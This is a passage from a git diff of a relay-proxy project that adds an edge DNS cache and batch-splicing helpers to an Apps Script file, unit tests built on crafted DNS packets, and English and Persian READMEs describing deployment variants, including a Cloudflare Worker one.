+ if (forwardOps.length === 0) { + return _json({ r: results }); + } + + // Nothing was served locally — forward verbatim, no splice needed. + if (forwardOps.length === ops.length) { + return _doTunnelBatchForward(ops); + } + + // Partial: forward the un-served ops and splice results back in place. + var resp = _doTunnelBatchFetch(forwardOps); + if (resp.error) return _json({ e: resp.error }); + if (resp.r.length !== forwardOps.length) { + // Tunnel-node version skew — bail explicitly rather than silently + // route TCP responses to UDP sids. + return _json({ e: "tunnel batch length mismatch" }); + } + return _json({ r: _spliceTunnelResults(forwardIdx, resp.r, results) }); +} +// Verbatim forward: no splice, response passed through unchanged. +function _doTunnelBatchForward(ops) { var resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", { method: "post", contentType: "application/json", - payload: JSON.stringify(payload), + payload: JSON.stringify({ k: TUNNEL_AUTH_KEY, ops: ops }), muteHttpExceptions: true, followRedirects: true, }); - if (resp.getResponseCode() !== 200) { return _json({ e: "tunnel batch HTTP " + resp.getResponseCode() }); } - return ContentService.createTextOutput(resp.getContentText()) .setMimeType(ContentService.MimeType.JSON); } +// Forward + parse for the splice path. Returns { r:[...] } on success or +// { error: "..." } on any failure. 
+function _doTunnelBatchFetch(ops) { + var resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", { + method: "post", + contentType: "application/json", + payload: JSON.stringify({ k: TUNNEL_AUTH_KEY, ops: ops }), + muteHttpExceptions: true, + followRedirects: true, + }); + if (resp.getResponseCode() !== 200) { + return { error: "tunnel batch HTTP " + resp.getResponseCode() }; + } + try { + var parsed = JSON.parse(resp.getContentText()); + return { r: (parsed && parsed.r) || [] }; + } catch (err) { + return { error: "tunnel batch parse error" }; + } +} + +// Pure helper: writes forwardedResults[j] into allResults[forwardIdx[j]] +// for each j. Returns the mutated allResults so callers can chain. Pure +// function — testable without the GAS runtime. +function _spliceTunnelResults(forwardIdx, forwardedResults, allResults) { + for (var j = 0; j < forwardIdx.length; j++) { + allResults[forwardIdx[j]] = forwardedResults[j]; + } + return allResults; +} + // ========================== HTTP relay mode ========================== function _doSingle(req) { @@ -217,3 +360,205 @@ function _json(obj) { ContentService.MimeType.JSON ); } + +// ========================== Edge DNS helpers ========================== + +// Tries to serve a single udp_open DNS op from CacheService or DoH. +// Returns a synthesized batch-result {sid, pkts, eof} on success, or null +// on any failure / unsupported case so the caller can forward to the +// tunnel-node. Null is the safe default — every error path returns null. 
+function _edgeDnsTry(op) { + try { + var bytes = Utilities.base64Decode(op.d); + if (!bytes || bytes.length < 12) return null; + + var q = _dnsParseQuestion(bytes); + if (!q) return null; + if (EDGE_DNS_REFUSE_QTYPES[q.qtype]) return null; + + var key = EDGE_DNS_CACHE_PREFIX + q.qtype + ":" + q.qname; + if (key.length > EDGE_DNS_MAX_KEY_LEN) return null; + var cache = CacheService.getScriptCache(); + + var stored = null; + try { stored = cache.get(key); } catch (_) {} + if (stored) { + try { + var hit = Utilities.base64Decode(stored); + if (hit && hit.length >= 12) { + // Rewrite txid to match this query (RFC 1035 §4.1.1). + var rewritten = _dnsRewriteTxid(hit, q.txid); + return { + sid: "edns-cache", + pkts: [Utilities.base64Encode(rewritten)], + eof: true, + }; + } + } catch (_) { /* corrupt cache entry — fall through to DoH */ } + } + + for (var i = 0; i < EDGE_DNS_RESOLVERS.length; i++) { + var reply = _edgeDnsDoh(EDGE_DNS_RESOLVERS[i], bytes); + if (!reply) continue; + + var rcode = reply[3] & 0x0F; + var ttl; + if (rcode === 2 || rcode === 3) { + ttl = EDGE_DNS_NEG_TTL_S; + } else { + var minTtl = _dnsMinTtl(reply); + ttl = (minTtl === null) ? EDGE_DNS_NEG_TTL_S : minTtl; + if (ttl < EDGE_DNS_MIN_TTL_S) ttl = EDGE_DNS_MIN_TTL_S; + if (ttl > EDGE_DNS_MAX_TTL_S) ttl = EDGE_DNS_MAX_TTL_S; + } + + try { + cache.put(key, Utilities.base64Encode(reply), ttl); + } catch (_) { + // >100KB value or transient quota — still return the live answer. + } + + // The DoH reply already echoes our query's txid; rewrite defensively + // in case a resolver mangles it. + var fixed = _dnsRewriteTxid(reply, q.txid); + return { + sid: "edns-doh", + pkts: [Utilities.base64Encode(fixed)], + eof: true, + }; + } + return null; + } catch (err) { + return null; + } +} + +// Single DoH GET against `url`. Returns the reply as a byte array, or null +// on any failure (HTTP non-200, network error, malformed body). 
+function _edgeDnsDoh(url, queryBytes) { + try { + var dns = Utilities.base64EncodeWebSafe(queryBytes).replace(/=+$/, ""); + var resp = UrlFetchApp.fetch(url + "?dns=" + dns, { + method: "get", + muteHttpExceptions: true, + followRedirects: true, + headers: { accept: "application/dns-message" }, + }); + if (resp.getResponseCode() !== 200) return null; + var body = resp.getContent(); + if (!body || body.length < 12) return null; + return body; + } catch (err) { + return null; + } +} + +// Returns { txid, qname, qtype } from a DNS wire-format query. +// qname is lowercased and dot-joined (no trailing dot). Null on malformed. +function _dnsParseQuestion(bytes) { + if (bytes.length < 12) return null; + var qdcount = ((bytes[4] & 0xFF) << 8) | (bytes[5] & 0xFF); + // RFC ambiguity: multi-question queries are essentially unused in + // practice and would mis-key the cache (we'd cache a multi-answer reply + // under only the first question). Bail and let the tunnel-node handle it. + if (qdcount !== 1) return null; + + var off = 12; + var labels = []; + var nameLen = 0; + while (off < bytes.length) { + var len = bytes[off] & 0xFF; + if (len === 0) { off++; break; } + if ((len & 0xC0) !== 0) return null; // questions don't use compression + if (len > 63) return null; + off++; + if (off + len > bytes.length) return null; + var label = ""; + for (var i = 0; i < len; i++) { + var c = bytes[off + i] & 0xFF; + if (c >= 0x41 && c <= 0x5A) c += 0x20; // ASCII lowercase + label += String.fromCharCode(c); + } + labels.push(label); + off += len; + nameLen += len + 1; + if (nameLen > 255) return null; + } + if (off + 4 > bytes.length) return null; + var qtype = ((bytes[off] & 0xFF) << 8) | (bytes[off + 1] & 0xFF); + + return { + txid: ((bytes[0] & 0xFF) << 8) | (bytes[1] & 0xFF), + qname: labels.join("."), + qtype: qtype, + }; +} + +// Walks the DNS reply's answer + authority sections and returns the min RR +// TTL, or null if there are no RRs (caller treats null as "use neg TTL"). 
+// Returns null on any malformed input. +function _dnsMinTtl(bytes) { + if (bytes.length < 12) return null; + var qdcount = ((bytes[4] & 0xFF) << 8) | (bytes[5] & 0xFF); + var ancount = ((bytes[6] & 0xFF) << 8) | (bytes[7] & 0xFF); + var nscount = ((bytes[8] & 0xFF) << 8) | (bytes[9] & 0xFF); + + var off = 12; + for (var q = 0; q < qdcount; q++) { + off = _dnsSkipName(bytes, off); + if (off < 0 || off + 4 > bytes.length) return null; + off += 4; + } + + var min = null; + var rrTotal = ancount + nscount; + for (var r = 0; r < rrTotal; r++) { + off = _dnsSkipName(bytes, off); + if (off < 0 || off + 10 > bytes.length) return null; + // 2B type, 2B class, 4B TTL, 2B rdlength + var ttl = ((bytes[off + 4] & 0xFF) * 0x1000000) + + (((bytes[off + 5] & 0xFF) << 16) + | ((bytes[off + 6] & 0xFF) << 8) + | (bytes[off + 7] & 0xFF)); + // RFC 2181: TTLs are 32-bit unsigned; values with the top bit set are + // treated as 0. Multiplying the high byte (instead of <<24) avoids V8 + // sign-extension and keeps `ttl` in [0, 2^32). + if (ttl < 0 || ttl > 0x7FFFFFFF) ttl = 0; + if (min === null || ttl < min) min = ttl; + var rdlen = ((bytes[off + 8] & 0xFF) << 8) | (bytes[off + 9] & 0xFF); + off += 10 + rdlen; + if (off > bytes.length) return null; + } + return min; +} + +// Advances past a DNS name (sequence of labels or 16-bit pointer). +// Returns the new offset, or -1 on malformed input. +function _dnsSkipName(bytes, off) { + while (off < bytes.length) { + var len = bytes[off] & 0xFF; + if (len === 0) return off + 1; + if ((len & 0xC0) === 0xC0) { + if (off + 2 > bytes.length) return -1; + return off + 2; // pointer terminates the name in-place + } + if ((len & 0xC0) !== 0) return -1; // reserved label type + if (len > 63) return -1; + off += 1 + len; + } + return -1; +} + +// Returns a copy of `bytes` with the first 2 bytes overwritten by the +// big-endian 16-bit transaction id. 
Coerces to signed-byte range so the +// result round-trips through Utilities.base64Encode regardless of whether +// the runtime exposes bytes as signed Java int8 or unsigned JS numbers. +function _dnsRewriteTxid(bytes, txid) { + var out = []; + for (var i = 0; i < bytes.length; i++) out.push(bytes[i]); + var hi = (txid >> 8) & 0xFF; + var lo = txid & 0xFF; + out[0] = hi > 127 ? hi - 256 : hi; + out[1] = lo > 127 ? lo - 256 : lo; + return out; +} diff --git a/assets/apps_script/README.md b/assets/apps_script/README.md index 1cf339a2..6af81d64 100644 --- a/assets/apps_script/README.md +++ b/assets/apps_script/README.md @@ -1,13 +1,18 @@ -# Apps Script source (mirrored) +# Apps Script source -The file `Code.gs` next to this README is a verbatim snapshot of the upstream script you deploy in your own Google Apps Script project: +Three deploy-ready Apps Script files live here. They all speak the same `{k, m, u, h, b, ct, r}` wire protocol with `mhrv-rs`, so the client just points its `script_id` at whichever deployment you want — no mode change required. -- Upstream: -- Raw link: +## Variants and origins -This copy lives in our repo for two reasons: +- **`Code.gs`** — standard relay. **Verbatim mirror of upstream.** Apps Script does the outbound fetch itself. This is the default choice for most users. + - Upstream: + - Credit: [@masterking32](https://github.com/masterking32). We do not modify this file. + - The mirror lives here so that (a) users on networks where `raw.githubusercontent.com` is unreachable can still deploy from a `git clone` / ZIP, and (b) we have a snapshot to diff against if upstream changes silently break the informal relay protocol. -1. **Survives upstream outages**: if the user is on a network where raw.githubusercontent.com is temporarily unreachable but they can clone or ZIP this repo, they still have the deploy-ready file. -2. 
**Pins what we tested against**: the relay protocol between `mhrv-rs` and the script is informal; upstream changes can silently break us. Keeping a snapshot here lets us diff and see if a spec drift is responsible for any reported breakage. +- **`CodeFull.gs`** — superset of `Code.gs` that additionally proxies raw-TCP / UDP via `tunnel-node` (used by `mode: "full"`). **Maintained in this repo** — written for this Rust port and not present upstream. Deploy this if you want full-tunnel mode; details in the file's header comment. -All credit for `Code.gs` goes to [@masterking32](https://github.com/masterking32) — we do not modify it. If you're using mhrv-rs, follow the upstream deploy instructions in the script's header comment. The only edit **you** must make is the `AUTH_KEY` constant — set it to a strong secret and reuse that exact string in your `mhrv-rs` config. +- **`Code.cfw.gs`** — Apps Script becomes a thin auth+forward layer; the actual outbound fetch happens on a Cloudflare Worker you also deploy ([`assets/cloudflare/`](../cloudflare/)). **Derivative work — not unmodified upstream.** The pattern of forwarding through a Cloudflare Worker came from [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw); this file inherits hardening from `Code.gs` (decoy-on-bad-auth, fail-closed sentinels) and adds chunked batch forwarding (`Promise.all` on the Worker side, `ceil(N/40)` GAS calls per batch) that the upstream `mhr-cfw` does not have. Faster per-call latency, worse YouTube long-form, no fix for Cloudflare anti-bot. Read [`assets/cloudflare/README.md`](../cloudflare/README.md) before choosing this one. + +## What you must edit before deploying + +For every variant: change `AUTH_KEY` from its placeholder to a strong secret, and use that same string in your `mhrv-rs` config's `auth_key`. 
`Code.cfw.gs` additionally requires setting `WORKER_URL` to your deployed Cloudflare Worker URL; `CodeFull.gs` additionally requires `TUNNEL_SERVER_URL` and `TUNNEL_AUTH_KEY` for the tunnel-node leg. diff --git a/assets/apps_script/tests/edge_dns_test.js b/assets/apps_script/tests/edge_dns_test.js new file mode 100644 index 00000000..f59c7576 --- /dev/null +++ b/assets/apps_script/tests/edge_dns_test.js @@ -0,0 +1,212 @@ +// Pure-JS sanity tests for the edge DNS cache helpers in CodeFull.gs. +// +// Run from repo root: node assets/apps_script/tests/edge_dns_test.js +// +// The tests extract the helpers that don't depend on the GAS runtime +// (Utilities, CacheService, UrlFetchApp) and exercise them against +// crafted DNS wire-format payloads. They catch the bugs most likely to +// regress when editing the parser: txid handling, name-pointer +// compression, TTL sign-extension, splice ordering with mixed batches. + +'use strict'; + +const fs = require('fs'); +const path = require('path'); + +const SRC = path.join(__dirname, '..', 'CodeFull.gs'); +const src = fs.readFileSync(SRC, 'utf8'); + +// Extract pure-JS helpers and eval them in a shared scope so cross-refs +// (_dnsMinTtl → _dnsSkipName) resolve. +const NAMES = [ + '_dnsSkipName', + '_dnsParseQuestion', + '_dnsMinTtl', + '_dnsRewriteTxid', + '_spliceTunnelResults', +]; +let bundle = ''; +for (const name of NAMES) { + const re = new RegExp(`function ${name}\\b[\\s\\S]*?\\n\\}\\n`, 'g'); + const m = src.match(re); + if (!m) throw new Error('helper not found in CodeFull.gs: ' + name); + bundle += m[0] + '\n'; +} +bundle += `return { ${NAMES.join(', ')} };`; +// eslint-disable-next-line no-new-func +const ctx = new Function(bundle)(); + +let passed = 0; +function ok(label) { console.log(' ok'); passed++; } +function check(label, cond, detail) { + if (!cond) { + console.error('FAIL: ' + label + (detail ? ' — ' + detail : '')); + process.exit(1); + } +} + +// --- 1. 
parse a query for example.com A --- +const q1 = Buffer.from([ + 0x12, 0x34, // txid + 0x01, 0x00, // flags: RD=1 + 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // counts + 0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, // "example" + 0x03, 0x63, 0x6f, 0x6d, 0x00, // "com" 0 + 0x00, 0x01, 0x00, 0x01, // qtype=A, qclass=IN +]); +console.log('TEST 1 query parse'); +const r1 = ctx._dnsParseQuestion(q1); +check('txid', r1.txid === 0x1234, r1 && r1.txid.toString(16)); +check('qname', r1.qname === 'example.com', r1 && r1.qname); +check('qtype', r1.qtype === 1); +ok(); + +// --- 2. case-fold (DNS names are case-insensitive on the wire) --- +const q2 = Buffer.from([ + 0xab, 0xcd, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x07, 0x45, 0x58, 0x41, 0x4d, 0x50, 0x4c, 0x45, // "EXAMPLE" + 0x03, 0x43, 0x4f, 0x4d, 0x00, // "COM" 0 + 0x00, 0x1c, 0x00, 0x01, // qtype=AAAA(28) +]); +console.log('TEST 2 case-fold to lowercase'); +const r2 = ctx._dnsParseQuestion(q2); +check('lowercased qname', r2.qname === 'example.com', r2 && r2.qname); +check('qtype AAAA', r2.qtype === 28); +ok(); + +// --- 3. txid rewrite preserves all other bytes --- +console.log('TEST 3 txid rewrite is byte-identical except [0..1]'); +const rewritten = ctx._dnsRewriteTxid(q1, 0xdead); +check('hi byte', (rewritten[0] & 0xFF) === 0xde); +check('lo byte', (rewritten[1] & 0xFF) === 0xad); +check('length', rewritten.length === q1.length); +for (let i = 2; i < q1.length; i++) { + check('byte ' + i + ' unchanged', (rewritten[i] & 0xFF) === q1[i]); +} +check('source not mutated (cache safety)', + q1[0] === 0x12 && q1[1] === 0x34, 'source bytes 0..1 = ' + q1[0] + ',' + q1[1]); +ok(); + +// --- 4. 
min-TTL extraction with answer name-pointer compression --- +const reply4 = Buffer.from([ + 0x12, 0x34, 0x81, 0x80, + 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, + 0x03, 0x63, 0x6f, 0x6d, 0x00, + 0x00, 0x01, 0x00, 0x01, + 0xc0, 0x0c, // pointer to QNAME + 0x00, 0x01, 0x00, 0x01, + 0x00, 0x00, 0x01, 0x2c, // TTL=300 + 0x00, 0x04, + 0x5d, 0xb8, 0xd8, 0x22, // 93.184.216.34 +]); +console.log('TEST 4 reply min-TTL (answer with pointer)'); +check('TTL=300', ctx._dnsMinTtl(reply4) === 300); +ok(); + +// --- 5. NXDOMAIN with SOA in authority — TTL comes from authority RR --- +const soa = Buffer.from([ + 0x02, 0x6e, 0x73, 0x04, 0x74, 0x65, 0x73, 0x74, 0x00, // mname "ns.test." + 0x0a, 0x68, 0x6f, 0x73, 0x74, 0x6d, 0x61, 0x73, 0x74, 0x65, 0x72, + 0x04, 0x74, 0x65, 0x73, 0x74, 0x00, // rname + 0x00, 0x00, 0x00, 0x01, + 0x00, 0x00, 0x00, 0x02, + 0x00, 0x00, 0x00, 0x03, + 0x00, 0x00, 0x00, 0x04, + 0x00, 0x00, 0x00, 0x05, +]); +const nxHeader = Buffer.from([ + 0x12, 0x34, 0x81, 0x83, // RCODE=3 + 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, + 0x07, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6e, 0x67, // "missing" + 0x04, 0x74, 0x65, 0x73, 0x74, 0x00, // "test" + 0x00, 0x01, 0x00, 0x01, +]); +const authRR = Buffer.concat([ + Buffer.from([0xc0, 0x14]), // pointer to "test" + Buffer.from([0x00, 0x06, 0x00, 0x01]), // SOA / IN + Buffer.from([0x00, 0x00, 0x00, 0x3c]), // TTL=60 + Buffer.from([0x00, soa.length]), + soa, +]); +const nxReply = Buffer.concat([nxHeader, authRR]); +console.log('TEST 5 NXDOMAIN: rcode + SOA TTL parse'); +check('rcode 3', (nxReply[3] & 0x0F) === 3); +check('soa TTL 60', ctx._dnsMinTtl(nxReply) === 60); +ok(); + +// --- 6. malformed (truncated header) → null --- +console.log('TEST 6 truncated input rejected'); +check('null', ctx._dnsParseQuestion(Buffer.from([0x00, 0x00, 0x01])) === null); +ok(); + +// --- 7. 
illegal pointer in question section → null --- +const q7 = Buffer.from([ + 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xc0, 0x0c, // illegal in question + 0x00, 0x01, 0x00, 0x01, +]); +console.log('TEST 7 reject compression in question'); +check('null', ctx._dnsParseQuestion(q7) === null); +ok(); + +// --- 8. TTL with high bit set is clamped to 0 (RFC 2181 §8) --- +// Build a minimal A reply where the answer's 4-byte TTL field is 0x80000000. +const reply8 = Buffer.from([ + 0x12, 0x34, 0x81, 0x80, + 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, + 0x03, 0x63, 0x6f, 0x6d, 0x00, + 0x00, 0x01, 0x00, 0x01, + 0xc0, 0x0c, + 0x00, 0x01, 0x00, 0x01, + 0x80, 0x00, 0x00, 0x00, // TTL with top bit set + 0x00, 0x04, + 0x01, 0x02, 0x03, 0x04, +]); +console.log('TEST 8 TTL with high bit → clamped to 0'); +const t8 = ctx._dnsMinTtl(reply8); +check('TTL clamped to 0 (not negative, not 2^31+)', t8 === 0, 'got ' + t8); +ok(); + +// --- 9. splice: forwarded results land at original op indices --- +console.log('TEST 9 splice into mixed-batch slots'); +// Simulate a 5-op batch where indices 1 and 3 were served locally as DNS +// hits, indices 0/2/4 were forwarded as TCP ops. 
+const allResults = new Array(5); +allResults[1] = { sid: 'edns-cache-1', pkts: ['A'], eof: true }; +allResults[3] = { sid: 'edns-doh-3', pkts: ['B'], eof: true }; +const forwardIdx = [0, 2, 4]; +const forwardedResults = [ + { sid: 'tcp-0', d: 'X' }, + { sid: 'tcp-2', d: 'Y' }, + { sid: 'tcp-4', d: 'Z' }, +]; +const merged = ctx._spliceTunnelResults(forwardIdx, forwardedResults, allResults); +check('slot 0 from tunnel', merged[0].sid === 'tcp-0'); +check('slot 1 from cache', merged[1].sid === 'edns-cache-1'); +check('slot 2 from tunnel', merged[2].sid === 'tcp-2'); +check('slot 3 from doh', merged[3].sid === 'edns-doh-3'); +check('slot 4 from tunnel', merged[4].sid === 'tcp-4'); +check('returns same array', merged === allResults); +ok(); + +// --- 10. splice when nothing is forwarded --- +console.log('TEST 10 splice with empty forward list'); +const allDns = [{ sid: 'a' }, { sid: 'b' }]; +const result10 = ctx._spliceTunnelResults([], [], allDns); +check('no mutation', result10[0].sid === 'a' && result10[1].sid === 'b'); +ok(); + +// --- 11. splice when everything is forwarded --- +console.log('TEST 11 splice with everything forwarded'); +const empty = new Array(3); +const result11 = ctx._spliceTunnelResults( + [0, 1, 2], + [{ sid: 'x' }, { sid: 'y' }, { sid: 'z' }], + empty, +); +check('all filled', result11[0].sid === 'x' && result11[2].sid === 'z'); +ok(); + +console.log('\n' + passed + ' tests passed'); diff --git a/assets/cloudflare/README.fa.md b/assets/cloudflare/README.fa.md new file mode 100644 index 00000000..4b183940 --- /dev/null +++ b/assets/cloudflare/README.fa.md @@ -0,0 +1,110 @@ +
+ +# خروجی Cloudflare Worker (پشتیبان جایگزین برای Apps Script) + +> *English: [README.md](README.md)* + +این پوشه یک **Cloudflare Worker** ارائه می‌کند که همراه با [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) شکل متفاوتی از حالت `apps_script` به شما می‌دهد: + +``` +mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► مقصد + ▲ فقط احراز هویت و فوروارد ▲ گرفتن داده + base64 +``` + +پشتیبان استاندارد ([`assets/apps_script/Code.gs`](../apps_script/Code.gs)) خودِ `Apps Script` کار `fetch` به مقصد را انجام می‌دهد. این نسخه‌ٔ جایگزین، `Apps Script` را به یک رلهٔ نازک تبدیل می‌کند و کارِ اصلی را به لبهٔ `Cloudflare` می‌سپارد. **خود `mhrv-rs` تغییر نمی‌کند** — همان پاکت `JSON` روی سیم، همان `mode: "apps_script"` در `config.json`، همان `script_id`. تنها تفاوت این است که `Apps Script` مستقر شدهٔ شما بعد از احراز هویت چه می‌کند. + +ایدهٔ اصلی: . این کپی یک بررسی `AUTH_KEY` روی خود `Worker` اضافه می‌کند، رفتار «صفحهٔ تقلبی برای کلید نامعتبر» را از `Code.gs` به ارث می‌برد، و یک محافظ در برابر حلقه‌شدن دارد. + +## چه‌وقت ارزش راه‌اندازی دارد؟ + +✅ مرور وب، باز کردن صفحات جدید، ترافیک گفتگومحور — به‌طور محسوسی سریع‌تر می‌شود. تأخیر هر تماس از کف ۲۵۰ تا ۵۰۰ میلی‌ثانیه‌ٔ `Apps Script` به ۱۰ تا ۵۰ میلی‌ثانیه‌ٔ لبهٔ `Cloudflare` کاهش می‌یابد. + +✅ تلگرام بلادرنگ — پیام‌های کوتاه و مکرر بیشترین سود را می‌برند. + +✅ شبکه‌هایی که در آن‌ها ابتدا سهمیهٔ **زمان اجرای `Apps Script`** (۹۰ دقیقه در روز برای حساب‌های مصرفی گوگل) تمام می‌شود، نه شمارش `URL fetch`. در این حالت `GAS` تقریباً هیچ زمانی صرف هر تماس نمی‌کند. + +❌ **امروز هیچ کاهشی در شمارش روزانهٔ `UrlFetchApp` به دست نمی‌آورید.** مسیر رلهٔ `HTTP` در `mhrv-rs` همیشه فقط یک پاکت تک‌آدرسی می‌فرستد و هیچ‌گاه شکل دسته‌ای `q: [...]` را تولید نمی‌کند، پس هر درخواست کاربر همچنان یک `UrlFetchApp` در `GAS` مصرف می‌کند — مستقل از اینکه کدام نسخهٔ `Code.gs` را مستقر کرده باشید. 
مسیر `Code.cfw.gs` به سمت `Worker` *قابلیت* پشتیبانی از دسته را دارد (قطعه‌بندی ۴۰‌تایی، پخش‌سازی روی `Worker` با `Promise.all`، هزینهٔ `ceil(N / 40)` به جای `N`)، ولی این شاخه از هیچ کلاینت موجودی فراخوانی نمی‌شود. **تا زمانی که `mhrv-rs` خودش `HTTP relay` را دسته‌بندی نکند، سقف روزانهٔ ~۲۰٬۰۰۰ مصرف نسبت به `Code.gs` تغییر نمی‌کند.** این پشتیبانی برای سازگاری آینده در کد نگه داشته شده — هزینه‌ای ندارد و روزی که کلاینتِ دسته‌بندی‌کننده برسد، خود به خود فعال می‌شود. + +❌ ویدیوهای طولانی یوتیوب — **بدتر** می‌شود، نه بهتر. `Apps Script` تا حدود ۶ دقیقه دیوار اجرا (`wall`) به ازای هر فراخوانی می‌دهد؛ `Cloudflare Workers` در ۳۰ ثانیه قطع می‌کنند. صخرهٔ `SABR` زودتر فرا می‌رسد. برای استفادهٔ یوتیوب‌محور، روی `Code.gs` بمانید. + +❌ سایت‌هایی که پشت ضدبات `Cloudflare` هستند (توییتر/`X`، `OpenAI`، …) — `IP` خروجی حالا داخل خود `Cloudflare` است، که ضدبات `Cloudflare` آن را به‌عنوان «درخواست داخلی `Worker`» انگشت‌نگاری می‌کند. اغلب **سختگیرانه‌تر** از `IP` گوگل برخورد می‌شود. این مشکلی جدا از عبور از `DPI` است و هیچ‌کدام از این دو نسخه آن را حل نمی‌کنند. + +❌ اگر/زمانی که `HTTP relay` دسته‌ای فعال شود، سقف ۳۰ ثانیه‌ٔ `Cloudflare` روی **کندترین آدرس در هر قطعه** اعمال خواهد شد، نه به‌ازای هر `URL` — یک مقصد قفل‌شده می‌تواند کل قطعهٔ ۴۰ آدرسی را به `timeout` بکشاند. تلاش مجدد تک‌به‌تک در `mhrv-rs` این را پوشش می‌دهد، اما تفاوت رفتاری نسبت به دیوار `per-URL` در `fetchAll` استانداردِ `Code.gs` است. (امروز بی‌اثر است چون کلاینت دسته نمی‌فرستد.) + +## راه‌اندازی + +سه رشتهٔ هم‌خوان نیاز دارید: یک `AUTH_KEY` که بین `worker.js`، `Code.cfw.gs` و `config.json` خود `mhrv-rs` مشترک است. یک رمز تصادفی قوی انتخاب کنید و در هر سه جا paste کنید. + +### ۱. استقرار `Worker` + +۱. وارد شوید → **`Workers & Pages`** → **`Create`** → **`Hello World`** → **`Deploy`**. +۲. روی **`Edit code`** بزنید، کد پیش‌فرض را پاک کنید و محتوای [`worker.js`](worker.js) را paste کنید. +۳. ثابت `AUTH_KEY` در بالای فایل را به رمز قوی خودتان تغییر دهید. +۴. روی **`Deploy`** بزنید. 
آدرس `*.workers.dev` را کپی کنید — در مرحلهٔ بعد لازم است. + +### ۲. استقرار `Apps Script` + +۱. وارد با حساب گوگلتان شوید → **`New project`** → کد پیش‌فرض را پاک کنید. + +۲. محتوای [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) را paste کنید. + +۳. هر دو ثابت بالای فایل را تنظیم کنید: + - مقدار `AUTH_KEY` را همان رمزی بگذارید که در `worker.js` گذاشتید. + - مقدار `WORKER_URL` را آدرس کامل `https://…workers.dev` همان `Worker` که الان مستقر کردید بگذارید (حتماً با پیشوند `https://`). + +۴. از مسیر **`Deploy → New deployment → Web app`** استقرار را شروع کنید: مقدار `Execute as` را روی **`Me`** و `Who has access` را روی **`Anyone`** بگذارید. + +۵. سپس **`Deployment ID`** را کپی کنید. + +### ۳. اشاره دادن `mhrv-rs` به این `Apps Script` + +در `config.json` (یا از طریق فرم `UI`): + +```json +{ + "mode": "apps_script", + "script_id": "PASTE_DEPLOYMENT_ID_HERE", + "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE" +} +``` + +تمام. `mhrv-rs` لازم نیست بداند `Cloudflare` در کار است؛ از نگاه او این `script_id` مثل هر `Deployment` دیگری رفتار می‌کند. اگر چند `Deployment` دارید (بعضی استاندارد، بعضی `CFW`)، می‌توانید همه را در `script_ids: [...]` بگذارید — `round-robin` و `parallel-relay` همچنان روی همه‌شان کار می‌کند. + +## چرا هر سه `AUTH_KEY` باید یکی باشند؟ + +- **بین `mhrv-rs` و `Apps Script`**: جلوی این را می‌گیرد که هر `POST` تصادفی روی آدرس `*.googleusercontent.com` شما رله شود. درخواست‌هایی که این کلید را نداشته باشند، یک صفحهٔ `HTML` تقلبی می‌گیرند (به‌خاطر `DIAGNOSTIC_MODE = false` در `Code.cfw.gs`) و `Deployment` شما به‌جای یک تونل، شبیه یک پروژهٔ فراموش‌شده دیده می‌شود. +- **بین `Apps Script` و `Worker`**: اگر آدرس `Worker` لو برود، جلوی این را می‌گیرد که به یک رلهٔ `HTTP` باز برای مهاجم تبدیل شود. بدون این بررسی، `Worker` شما برای هر کسی که `URL` را پیدا کند، قابل سوءاستفاده است. نسخهٔ بالادست `mhr-cfw` این بررسی را ندارد؛ این کپی آن را اضافه می‌کند. 
+ +اگر می‌خواهید برای امنیت بیشتر روی هر بخش رمز جدا داشته باشید، `Code.cfw.gs` را ویرایش کنید تا یک `k` متفاوت از آن چیزی که از `mhrv-rs` می‌گیرد به `Worker` بفرستد. تنظیم تک‌رمز ساده‌ترین حالتِ درست است. + +## بررسی اینکه کار می‌کند + +همان روش پشتیبان استاندارد: را از طریق پروکسی باز کنید. باید یک `IP` متعلق به `Cloudflare` ببینید (چون `fetch` واقعی حالا از شبکهٔ `Cloudflare` خارج می‌شود)، نه یک `IP` متعلق به گوگل که با `Code.gs` می‌دیدید. اگر `IP` واقعی خودتان را ببینید، پروکسی استفاده نمی‌شود؛ اگر `IP` گوگل ببینید، اشتباهاً `Code.gs` را به‌جای `Code.cfw.gs` مستقر کرده‌اید. + +دکمهٔ **`Test`** در `UI` دسکتاپ همچنان کار می‌کند — یک درخواست `HEAD` از طریق هر `Apps Script Deployment` که تنظیم کرده‌اید رله می‌کند. + +## جدول مقایسه در یک نگاه + +| محور | `Code.gs` (استاندارد) | `Code.cfw.gs` (این نسخه) | +|---|---|---| +| کف تأخیر هر تماس | ۲۵۰–۵۰۰ میلی‌ثانیه (هاپ داخلی `GAS`) | ۱۰–۵۰ میلی‌ثانیه (لبهٔ `CF`) | +| سهمیهٔ `UrlFetchApp` در روز، **آنچه `mhrv-rs` امروز می‌فرستد** | ۱ سهمیه به‌ازای هر درخواست | ۱ سهمیه به‌ازای هر درخواست — یکسان (`mhrv-rs` فقط پاکت تک‌آدرسی تولید می‌کند) | +| سهمیهٔ `UrlFetchApp` در روز، **اگر کلاینتی در آینده دسته بفرستد** | تعداد `N` سهمیه (یکی برای هر آدرس از طریق `fetchAll`) | تعداد `ceil(N / 40)` سهمیه (قطعه‌بندی ۴۰‌تایی؛ پخش‌سازی روی `Worker` با `Promise.all`) | +| سقف درخواست `Cloudflare Workers` در روز (پلن رایگان) | ندارد | ۱۰۰٬۰۰۰ — بسیار بالاتر از چیزی که `GAS` می‌تواند تغذیه‌اش کند؛ گلوگاه نیست | +| 